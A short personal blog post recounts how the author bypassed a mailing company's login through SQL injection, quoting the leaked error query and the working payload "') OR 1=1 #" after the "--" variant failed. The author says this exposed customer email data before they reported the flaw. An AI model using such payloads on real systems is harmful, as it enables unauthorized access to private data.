I'm in it! no! AhH get me out .. wait.. lets check their website first..
wow.. 9 errors all based on file inclusion as sql injection..
So I managed to get to their login page and just trying to enter with username ' and password ' gave me the following error
SELECT `id`, `username` FROM `core__user` WHERE 1 AND (`core__user`.`username` = ''') AND (`core__user`.`active` = 'yes') AND (`core__user`.`password` = ENCODE('\'', 'z4p3DQSC'))
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'yes') AND (`core__user`.`password` = ENCODE('\'', 'z4p3DQSC'))' at line 1
How nice of them, printing the entire query for me! The first thing you might notice is why the hell are they escaping the password but not the username... why?????!??
So looking at the query,
') OR 1=1 --Should do the trick you'd say... nope it didn't.. Apparently they disabled the comment tags -- and \* But luckily we have a third. yes! it's the # !
') OR 1=1 #That let me in with full access to all their customers.. I could see who sent what email and to whom. This company I got the email from sent around 50k emails a day which is like lol.
Anyway I reported the error and they said they fixed the 'bug', they thanked me and told me they removed my email address.. The email address I used to sent them an email wasn't even in their database.. Good job. So I replied back to remove the entire mywebsite.nl range.
No comments:
Post a Comment